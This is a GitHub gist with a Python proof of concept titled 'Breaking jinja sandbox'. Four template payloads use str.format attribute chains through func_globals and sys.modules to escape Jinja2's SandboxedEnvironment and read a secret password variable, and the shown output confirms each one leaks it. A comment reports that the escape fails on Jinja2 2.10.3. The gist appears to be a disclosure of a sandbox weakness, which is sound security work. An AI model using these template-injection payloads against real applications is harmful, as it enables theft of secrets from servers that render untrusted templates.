Created
December 24, 2014 23:09
-
-
Save tailhook/e60f5b656dfb5a32e2f6 to your computer and use it in GitHub Desktop.
Breaking jinja sandbox
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from collections import namedtuple | |
| import sys | |
| import jinja2.sandbox | |
| password = "valuable password" | |
| class A(object): | |
| def _hidden_method(self): | |
| pass | |
| def just_function(a): | |
| return '"' + a + '"' | |
| jinja = jinja2.sandbox.SandboxedEnvironment() | |
| ctx = dict( | |
| named_tuple=namedtuple("hello", "a b")(1, 2), | |
| any_function=just_function, | |
| custom_instance=A, | |
| ) | |
| print(jinja.from_string(""" | |
| ANY_FUNCTION {{ "{.func_globals[sys].modules[__main__].password}".format(any_function) }} | |
| INSTANCE {{ "{._hidden_method.func_globals[sys].modules[__main__].password}".format(custom_instance) }} | |
| NAMED_TUPLE {{ "{._asdict.func_globals[OrderedDict].clear.func_globals[_sys].modules[__main__].password}".format(named_tuple) }} | |
| BUILTIN_RANGE {{ "{.func_globals[_mutable_sequence_types][1].insert.__func__.func_globals[sys].modules[__main__].password}".format(range) }} | |
| """).render(ctx)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ANY_FUNCTION valuable password | |
| INSTANCE valuable password | |
| NAMED_TUPLE valuable password | |
| BUILTIN_RANGE valuable password |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This is not breaking sandbox with version
Jinja2==2.10.3. Instead, it throws following exception (I tried the string provided by you in various order).